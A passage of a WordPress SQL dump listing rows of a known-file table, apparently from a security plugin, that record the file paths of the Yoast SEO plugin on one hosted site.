(1030, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/workouts-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/workouts-2240-rtl.css'),
(1031, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/workouts-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/workouts-2240.css'),
(1032, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-2240-rtl.css'),
(1033, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-2240.css'),
(1034, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-2240-rtl.css'),
(1035, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-2240.css'),
(1036, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-2240-rtl.css'),
(1037, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-2240.css'),
(1038, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-2240-rtl.css'),
(1039, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-2240.css'),
(1040, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl', 'wp-content/plugins/wordpress-seo/css/main-sitemap.xsl'),
(1041, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/Yoast_SEO_negative_icon.svg', 'wp-content/plugins/wordpress-seo/images/Yoast_SEO_negative_icon.svg'),
(1042, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/all_around_seo.png', 'wp-content/plugins/wordpress-seo/images/academy/all_around_seo.png'),
(1043, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/block_editor.png', 'wp-content/plugins/wordpress-seo/images/academy/block_editor.png'),
(1044, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/copywriting.png', 'wp-content/plugins/wordpress-seo/images/academy/copywriting.png'),
(1045, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/crawlability.png', 'wp-content/plugins/wordpress-seo/images/academy/crawlability.png'),
(1046, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/ecommerce.png', 'wp-content/plugins/wordpress-seo/images/academy/ecommerce.png'),
(1047, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/hosting_and_server.png', 'wp-content/plugins/wordpress-seo/images/academy/hosting_and_server.png'),
(1048, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/keyword_research.png', 'wp-content/plugins/wordpress-seo/images/academy/keyword_research.png'),
(1049, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/local.png', 'wp-content/plugins/wordpress-seo/images/academy/local.png'),
(1050, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/multilingual.png', 'wp-content/plugins/wordpress-seo/images/academy/multilingual.png'),
(1051, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/seo_for_beginners.png', 'wp-content/plugins/wordpress-seo/images/academy/seo_for_beginners.png'),
(1052, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/seo_for_wp.png', 'wp-content/plugins/wordpress-seo/images/academy/seo_for_wp.png'),
(1053, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/site_structure.png', 'wp-content/plugins/wordpress-seo/images/academy/site_structure.png'),
(1054, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/structured_data_for_beginners.png', 'wp-content/plugins/wordpress-seo/images/academy/structured_data_for_beginners.png'),
(1055, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/understanding_structured_data.png', 'wp-content/plugins/wordpress-seo/images/academy/understanding_structured_data.png'),
(1056, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/academy/wp_for_beginners.png', 'wp-content/plugins/wordpress-seo/images/academy/wp_for_beginners.png'),
(1057, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/acf-logo.png', 'wp-content/plugins/wordpress-seo/images/acf-logo.png'),
(1058, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/admin_bar.png', 'wp-content/plugins/wordpress-seo/images/admin_bar.png'),
(1059, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/ai-generator-preview.png', 'wp-content/plugins/wordpress-seo/images/ai-generator-preview.png'),
(1060, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/ai-generator.png', 'wp-content/plugins/wordpress-seo/images/ai-generator.png'),
(1061, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/alert-error-icon.svg', 'wp-content/plugins/wordpress-seo/images/alert-error-icon.svg'),
(1062, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/alert-info-icon.svg', 'wp-content/plugins/wordpress-seo/images/alert-info-icon.svg'),
(1063, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/alert-success-icon.svg', 'wp-content/plugins/wordpress-seo/images/alert-success-icon.svg'),
(1064, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/alert-warning-icon.svg', 'wp-content/plugins/wordpress-seo/images/alert-warning-icon.svg'),
(1065, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/cornerstone_content.png', 'wp-content/plugins/wordpress-seo/images/cornerstone_content.png'),
(1066, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/error-icon.svg', 'wp-content/plugins/wordpress-seo/images/error-icon.svg'),
(1067, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/inclusive_language_analysis.png', 'wp-content/plugins/wordpress-seo/images/inclusive_language_analysis.png'),
(1068, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/index.php', 'wp-content/plugins/wordpress-seo/images/index.php'),
(1069, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/indexables_3_left_bubble_optm.svg', 'wp-content/plugins/wordpress-seo/images/indexables_3_left_bubble_optm.svg'),
(1070, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/indexnow.png', 'wp-content/plugins/wordpress-seo/images/indexnow.png'),
(1071, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/insights.png', 'wp-content/plugins/wordpress-seo/images/insights.png'),
(1072, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/link-in-icon.svg', 'wp-content/plugins/wordpress-seo/images/link-in-icon.svg'),
(1073, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/link-out-icon.svg', 'wp-content/plugins/wordpress-seo/images/link-out-icon.svg'),
(1074, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/link_suggestions.png', 'wp-content/plugins/wordpress-seo/images/link_suggestions.png'),
(1075, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/local_plugin_assistant.svg', 'wp-content/plugins/wordpress-seo/images/local_plugin_assistant.svg'),
(1076, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_man_1_optim.svg', 'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_man_1_optim.svg'),
(1077, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_1_optim.svg', 'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_1_optim.svg'),
(1078, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_2_optim.svg', 'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_2_optim.svg'),
(1079, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/new-to-configuration-notice.svg', 'wp-content/plugins/wordpress-seo/images/new-to-configuration-notice.svg'),
(1080, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/news_plugin_assistant.svg', 'wp-content/plugins/wordpress-seo/images/news_plugin_assistant.svg'),
(1081, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/open_graph.png', 'wp-content/plugins/wordpress-seo/images/open_graph.png'),
(1082, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/plugin_subscription.svg', 'wp-content/plugins/wordpress-seo/images/plugin_subscription.svg'),
(1083, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/question-mark.png', 'wp-content/plugins/wordpress-seo/images/question-mark.png'),
(1084, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/readability-icon.svg', 'wp-content/plugins/wordpress-seo/images/readability-icon.svg'),
(1085, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/readability_analysis.png', 'wp-content/plugins/wordpress-seo/images/readability_analysis.png'),
(1086, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/rest_api.png', 'wp-content/plugins/wordpress-seo/images/rest_api.png'),
(1087, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/seo_analysis.png', 'wp-content/plugins/wordpress-seo/images/seo_analysis.png'),
(1088, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/slack_sharing.png', 'wp-content/plugins/wordpress-seo/images/slack_sharing.png'),
(1089, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/stale-cornerstone-content-in-yoast-seo.png', 'wp-content/plugins/wordpress-seo/images/stale-cornerstone-content-in-yoast-seo.png'),
(1090, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/succes_marieke_bubble_optm.svg', 'wp-content/plugins/wordpress-seo/images/succes_marieke_bubble_optm.svg'),
(1091, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/support/github.png', 'wp-content/plugins/wordpress-seo/images/support/github.png'),
(1092, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/support/help_center.png', 'wp-content/plugins/wordpress-seo/images/support/help_center.png'),
(1093, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/support/support_forums.png', 'wp-content/plugins/wordpress-seo/images/support/support_forums.png'),
(1094, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/support-team.svg', 'wp-content/plugins/wordpress-seo/images/support-team.svg');
INSERT INTO `wpou_wfknownfilelist` VALUES
(1095, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/text_link_counter.png', 'wp-content/plugins/wordpress-seo/images/text_link_counter.png'),
(1096, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/twitter_card.png', 'wp-content/plugins/wordpress-seo/images/twitter_card.png'),
(1097, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/video_plugin_assistant.svg', 'wp-content/plugins/wordpress-seo/images/video_plugin_assistant.svg'),
(1098, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/woo_plugin_assistant.svg', 'wp-content/plugins/wordpress-seo/images/woo_plugin_assistant.svg'),
(1099, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/images/xml_sitemaps.png', 'wp-content/plugins/wordpress-seo/images/xml_sitemaps.png'),
(1100, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-addon-manager.php', 'wp-content/plugins/wordpress-seo/inc/class-addon-manager.php'),
(1101, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-my-yoast-api-request.php', 'wp-content/plugins/wordpress-seo/inc/class-my-yoast-api-request.php'),
(1102, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-post-type.php', 'wp-content/plugins/wordpress-seo/inc/class-post-type.php'),
(1103, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-rewrite.php', 'wp-content/plugins/wordpress-seo/inc/class-rewrite.php'),
(1104, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-upgrade-history.php', 'wp-content/plugins/wordpress-seo/inc/class-upgrade-history.php'),
(1105, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-upgrade.php', 'wp-content/plugins/wordpress-seo/inc/class-upgrade.php'),
(1106, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-admin-bar-menu.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-admin-bar-menu.php'),
(1107, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-content-images.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-content-images.php'),
(1108, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-fields.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-fields.php'),
(1109, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php'),
(1110, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-image-utils.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-image-utils.php'),
(1111, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-installation.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-installation.php'),
(1112, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-meta.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-meta.php'),
(1113, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-primary-term.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-primary-term.php'),
(1114, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-rank.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-rank.php'),
(1115, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php'),
(1116, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-replacement-variable.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-replacement-variable.php'),
(1117, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-shortlinker.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-shortlinker.php'),
(1118, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-statistics.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-statistics.php'),
(1119, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php', 'wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php'),
(1120, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/class-yoast-dynamic-rewrites.php', 'wp-content/plugins/wordpress-seo/inc/class-yoast-dynamic-rewrites.php'),
(1121, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/date-helper.php', 'wp-content/plugins/wordpress-seo/inc/date-helper.php'),
(1122, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php', 'wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php'),
(1123, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-invalid-json-exception.php', 'wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-invalid-json-exception.php'),
(1124, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/index.php', 'wp-content/plugins/wordpress-seo/inc/index.php'),
(1125, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-ajax-integration.php', 'wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-ajax-integration.php'),
(1126, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php', 'wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php'),
(1127, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/language-utils.php', 'wp-content/plugins/wordpress-seo/inc/language-utils.php'),
(1128, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-ms.php', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-ms.php'),
(1129, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-social.php', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-social.php'),
(1130, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-titles.php', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-titles.php'),
(1131, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-wpseo.php', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-wpseo.php'),
(1132, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option.php', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option.php'),
(1133, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-options.php', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-options.php'),
(1134, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/options/class-wpseo-taxonomy-meta.php', 'wp-content/plugins/wordpress-seo/inc/options/class-wpseo-taxonomy-meta.php'),
(1135, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-author-sitemap-provider.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-author-sitemap-provider.php'),
(1136, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-post-type-sitemap-provider.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-post-type-sitemap-provider.php'),
(1137, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-cache-data.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-cache-data.php'),
(1138, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-image-parser.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-image-parser.php'),
(1139, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-admin.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-admin.php'),
(1140, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache-validator.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache-validator.php'),
(1141, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php'),
(1142, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-renderer.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-renderer.php'),
(1143, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-router.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-router.php'),
(1144, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps.php'),
(1145, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/class-taxonomy-sitemap-provider.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/class-taxonomy-sitemap-provider.php'),
(1146, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php'),
(1147, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php', 'wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php'),
(1148, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php', 'wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php'),
(1149, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/wpseo-functions.php', 'wp-content/plugins/wordpress-seo/inc/wpseo-functions.php'),
(1150, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/inc/wpseo-non-ajax-functions.php', 'wp-content/plugins/wordpress-seo/inc/wpseo-non-ajax-functions.php'),
(1151, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/index.php', 'wp-content/plugins/wordpress-seo/index.php'),
(1152, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/576.js', 'wp-content/plugins/wordpress-seo/js/dist/576.js'),
(1153, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/academy.js', 'wp-content/plugins/wordpress-seo/js/dist/academy.js'),
(1154, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/addon-installation.js', 'wp-content/plugins/wordpress-seo/js/dist/addon-installation.js'),
(1155, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/admin-global.js', 'wp-content/plugins/wordpress-seo/js/dist/admin-global.js'),
(1156, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/admin-modules.js', 'wp-content/plugins/wordpress-seo/js/dist/admin-modules.js'),
(1157, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/analysis-worker.js', 'wp-content/plugins/wordpress-seo/js/dist/analysis-worker.js'),
(1158, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/api-client.js', 'wp-content/plugins/wordpress-seo/js/dist/api-client.js'),
(1159, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/block-editor.js', 'wp-content/plugins/wordpress-seo/js/dist/block-editor.js'),
(1160, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/bulk-editor.js', 'wp-content/plugins/wordpress-seo/js/dist/bulk-editor.js'),
(1161, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/classic-editor.js', 'wp-content/plugins/wordpress-seo/js/dist/classic-editor.js'),
(1162, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/crawl-settings.js', 'wp-content/plugins/wordpress-seo/js/dist/crawl-settings.js'),
(1163, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/dashboard-widget.js', 'wp-content/plugins/wordpress-seo/js/dist/dashboard-widget.js'),
(1164, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/dynamic-blocks.js', 'wp-content/plugins/wordpress-seo/js/dist/dynamic-blocks.js'),
(1165, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/edit-page.js', 'wp-content/plugins/wordpress-seo/js/dist/edit-page.js'),
(1166, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/editor-modules.js', 'wp-content/plugins/wordpress-seo/js/dist/editor-modules.js'),
(1167, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/elementor.js', 'wp-content/plugins/wordpress-seo/js/dist/elementor.js'),
(1168, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/analysis.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/analysis.js'),
(1169, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/analysisReport.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/analysisReport.js'),
(1170, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/chart.js.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/chart.js.js'),
(1171, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/components.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/components.js'),
(1172, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew.js'),
(1173, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/draftJs.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/draftJs.js'),
(1174, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/featureFlag.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/featureFlag.js'),
(1175, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/helpers.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/helpers.js'),
(1176, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/jed.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/jed.js'),
(1177, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/propTypes.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/propTypes.js'),
(1178, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/reactHelmet.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/reactHelmet.js'),
(1179, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/redux.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/redux.js'),
(1180, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/reduxJsToolkit.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/reduxJsToolkit.js'),
(1181, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/replacementVariableEditor.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/replacementVariableEditor.js'),
(1182, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/searchMetadataPreviews.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/searchMetadataPreviews.js'),
(1183, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/socialMetadataForms.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/socialMetadataForms.js'),
(1184, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide.js'),
(1185, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/styledComponents.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/styledComponents.js'),
(1186, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/uiLibrary.js', 'wp-content/plugins/wordpress-seo/js/dist/externals/uiLibrary.js'),
(1187, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals-components.js', 'wp-content/plugins/wordpress-seo/js/dist/externals-components.js'),
(1188, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals-contexts.js', 'wp-content/plugins/wordpress-seo/js/dist/externals-contexts.js'),
(1189, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals-redux.js', 'wp-content/plugins/wordpress-seo/js/dist/externals-redux.js'),
